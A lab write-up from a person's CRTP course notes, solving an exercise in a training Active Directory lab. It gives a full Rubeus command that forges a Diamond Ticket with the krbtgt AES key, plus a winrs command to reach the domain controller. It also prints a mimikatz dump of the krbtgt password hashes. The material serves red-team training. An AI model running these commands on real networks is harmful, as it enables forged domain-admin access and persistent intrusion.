Certified Red Team Professional (CRTP) - Notes
HomeGitHubPortfolioTwitter/XMediumCont@ct
  • 📝Certified Red Team Professional (CRTP) - Notes
    • ℹ️0 - Course Summary
    • 1️⃣1 - Active Directory (AD)
      • 1.1 - Introduction to Active Directory (AD)
      • 1.2 - Physical Components of AD
      • 1.3 - Logical Components of AD
    • 2️⃣2 - PowerShell
      • 2.1 - Introduction to PowerShell
      • 2.2 - Security and Detection
    • 3️⃣3 - AD Enumeration
      • 3.1 - Host & User Identification
      • 3.2 - Common Services Enum
        • 3.2.1 - LDAP & DNS Enum
        • 3.2.2 - SMB Enum & Common Attacks
      • 3.3 - Domain Enumeration
        • 3.3.1 - PowerView
          • 3.3.1.1 - Domain Enumeration (Video Lab)
        • 3.3.2 - BloodHound
    • 4️⃣4 - Trust and Privileges Mapping
      • 4.1 - Access Control (ACL/ACE)
      • 4.2 - Group Policy
      • 4.3 - Trusts
    • 5️⃣5 - Local Privilege Escalation
      • 5.1 - Privilege Escalation
        • 5.1.1 - Feature Abuse
        • 5.1.2 - Relaying
        • 5.1.3 - GPO Abuse
        • 5.1.4 - Unquoted Service Path
      • 5.2 - Tools
    • 7️⃣6 - Lateral Movement
      • 6.1 - PowerShell Remoting & Tradecraft
      • 6.2 - Credentials Extraction & Mimikatz
    • 9️⃣7 - Kerberos Attack and Privelege Escalation
      • 7.1 - Kerberos Intro
      • 7.2 - User Enum in Kerberos
      • 7.3 - AS-REP Roasting
      • 7.4 - Kerberoasting
      • 7.5 - Kerberos Delegation
        • Uncostrained Delegation
        • Constrained Delegation
      • 7.6 - Accross Trusts
        • Page
        • External Trust
        • Forest
        • Domain Trust
    • 8️⃣8 - Persistence
      • 8.1 - Golden Ticket
      • 8.2 - Silver Ticket
      • 8.3 - Diamond Ticket
      • 8.4 - Skeleton Key
      • 8.5 - DSRM
      • 8.6 - Custom SSP
      • 8.7 - Persistence via ACLs
        • 8.7.1 - AdminSDHolder
        • 8.7.2 - DCSync Attack
        • 8.7.3 - Security Descriptors
    • 9️⃣9 - Detection and Defense
    • Lab
      • 0 - Lab Instructions
      • 1 - LO 1️
      • 2 - LO2️
      • 3 - LO 3️
      • 4 - LO 4️
      • 5 - LO 5️
      • 6 - LO 6️
      • 7 - LO 7️
      • 8 - LO8️
      • 9 - LO9️
      • 10 - LO1️0️
      • 11 - LO1️1️
      • 12 - LO1️2️
      • 13 - LO1️3️
      • 14 - LO1️4️
      • 15 - LO1️5️
      • 16 - LO1️6️
      • 17 - LO1️7️
      • 18 - LO1️8️
      • 19 - LO1️9️
      • 20 - LO2️0️
      • 21 - LO2️1️
      • 22 - LO 2️2️
      • 23 - LO2️3️
    • 📄Report
      • How to write a PT Report
  • 🛣️RoadMap / Exam Preparation
  • 📔CRTP Cheat Sheet
Powered by GitBook
On this page
  • Tasks
  • Solutions
  • 1 - Use Domain Admin privileges obtained earlier to execute the Diamond Ticket attack
  • Flag 19 [dcorp-dc] - Name of the account whose secrets are used for the Diamond Ticket attack 🚩
  1. Certified Red Team Professional (CRTP) - Notes
  2. Lab

10 - LO1️0️

Learning Object 10

Previous9 - LO9️Next11 - LO1️1️

Last updated 21 days ago

Tasks

1 - Use Domain Admin privileges obtained earlier to execute the Diamond Ticket attack

Flag 19 [dcorp-dc] - Name of the account whose secrets are used for the Diamond Ticket attack 🚩

Solutions

1 - Use Domain Admin privileges obtained earlier to execute the Diamond Ticket attack

Run a new shell as administrator and use the following Rubeus command to execute the Diamond Ticket attack:

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args diamond /krbkey:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /tgtdeleg /enctype:aes /ticketuser:administrator /domain:dollarcorp.moneycorp.local /dc:dcorp-dc.dollarcorp.moneycorp.local /ticketuserid:500 /groups:512 /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

Using the new process started, access the DC using winrs:

winrs -r:dcorp-dc cmd
set username

Flag 19 [dcorp-dc] - Name of the account whose secrets are used for the Diamond Ticket attack 🚩

Krbtgt's secrets are used for the Diamond Ticket attack.

Object RDN           : krbtgt

** SAM ACCOUNT **

SAM Username         : krbtgt
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration   :
Password last change : 11/11/2022 10:59:41 PM
Object Security ID   : S-1-5-21-719815819-3726368948-3917688648-502
Object Relative ID   : 502

Credentials:
  Hash NTLM: 4e9815869d2090ccfca61c1fe0d23986
    ntlm- 0: 4e9815869d2090ccfca61c1fe0d23986
    lm  - 0: ea03581a1268674a828bde6ab09db837

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : 6d4cc4edd46d8c3d3e59250c91eac2bd

* Primary:Kerberos-Newer-Keys *
    Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgt
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848
      aes128_hmac       (4096) : e74fa5a9aa05b2c0b2d196e226d8820e
      des_cbc_md5       (4096) : 150ea2e934ab6b80

* Primary:Kerberos *
    Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgt
    Credentials
      des_cbc_md5       : 150ea2e934ab6b80

* Packages *
    NTLM-Strong-NTOWF

* Primary:WDigest *
    01  a0e60e247b498de4cacfac3ba615af01
    02  86615bb9bf7e3c731ba1cb47aa89cf6d
    03  637dfb61467fdb4f176fe844fd260bac
    04  a0e60e247b498de4cacfac3ba615af01
    05  86615bb9bf7e3c731ba1cb47aa89cf6d
    06  d2874f937df1fd2b05f528c6e715ac7a
    07  a0e60e247b498de4cacfac3ba615af01
    08  e8ddc0d55ac23e847837791743b89d22
    09  e8ddc0d55ac23e847837791743b89d22
    10  5c324b8ab38cfca7542d5befb9849fd9
    11  f84dfb60f743b1368ea571504e34863a
    12  e8ddc0d55ac23e847837791743b89d22
    13  2281b35faded13ae4d78e33a1ef26933
    14  f84dfb60f743b1368ea571504e34863a
    15  d9ef5ed74ef473e89a570a10a706813e
    16  d9ef5ed74ef473e89a570a10a706813e
    17  87c75daa20ad259a6f783d61602086aa
    18  f0016c07fcff7d479633e8998c75bcf7
    19  7c4e5eb0d5d517f945cf22d74fec380e
    20  cb97816ac064a567fe37e8e8c863f2a7
    21  5adaa49a00f2803658c71f617031b385
    22  5adaa49a00f2803658c71f617031b385
    23  6d86f0be7751c8607e4b47912115bef2
    24  caa61bbf6b9c871af646935febf86b95
    25  caa61bbf6b9c871af646935febf86b95
    26  5d8e8f8f63b3bb6dd48db5d0352c194c
    27  3e139d350a9063db51226cfab9e42aa1
    28  d745c0538c8fd103d71229b017a987ce
    29  40b43724fa76e22b0d610d656fb49ddd


mimikatz(commandline) # exit
Bye!
📝